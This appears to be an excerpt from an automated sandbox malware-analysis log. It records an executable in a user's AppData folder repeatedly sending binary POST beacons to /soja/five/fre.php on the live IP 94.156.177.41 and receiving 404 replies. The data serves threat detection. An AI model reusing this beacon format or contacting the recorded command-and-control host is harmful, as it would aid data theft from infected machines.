Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Code function: 18_2_00404ED4 recv,

18_2_00404ED4

Source: unknown

HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 172Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
